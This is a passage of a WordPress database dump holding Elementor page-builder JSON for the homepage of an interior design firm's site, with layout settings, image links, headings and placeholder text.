flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3438,4798,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3439,4798,'_elementor_pro_version','3.8.1'),(3440,4799,'_wp_page_template','elementor_header_footer'),(3441,4799,'_elementor_edit_mode','builder'),(3442,4799,'_elementor_template_type','wp-page'),(3443,4799,'_elementor_version','3.8.1'),(3444,4799,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad 